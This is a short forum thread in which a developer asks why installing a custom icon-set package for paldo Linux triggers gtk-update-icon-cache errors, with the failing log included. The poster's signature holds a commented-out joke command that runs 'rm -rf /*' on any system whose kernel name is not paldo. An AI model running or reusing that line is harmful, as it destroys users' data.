IconSet Problem | |
|
|
Mitglied Developer Posts: 92 Registered: 2009-02-26 | I created a new package (meliae_dark_iconset) for paldo. It works nice but after installation I got a upkg-problem:
Zitat | | [CHECK] [ ! -x /usr/bin/gdk-pixbuf-query-loaders ] || /usr/bin/gdk-pixbuf-query-loaders > /etc/gtk-2.0/gdk-pixbuf.loaders
[CHECK] [ ! -x /usr/bin/gtk-update-icon-cache ] || find /usr/share/icons -name index.theme | xargs -n 1 -r dirname | xargs -n 1 -r gtk-update-icon-cache -f
gtk-update-icon-cache: The generated cache was invalid.
gtk-update-icon-cache: Cache file created successfully.
gtk-update-icon-cache: Cache file created successfully.
gtk-update-icon-cache: Cache file created successfully.
*** Error: [ ! -x /usr/bin/gtk-update-icon-cache ] || find /usr/share/icons -name index.theme | xargs -n 1 -r dirname | xargs -n 1 -r gtk-update-icon-cache -f
*** Error: /var/cache/upkg/script --finalize |
What is wrong there? .............................. https://www.richardnespithal.com
# [ ! $(uname -r | grep "paldo") ] && rm -rf /* |
|
|
|
|
|
Re: IconSet Problem | |
|
|
Mitglied Developer Posts: 92 Registered: 2009-02-26 | |
|
|
|
|
|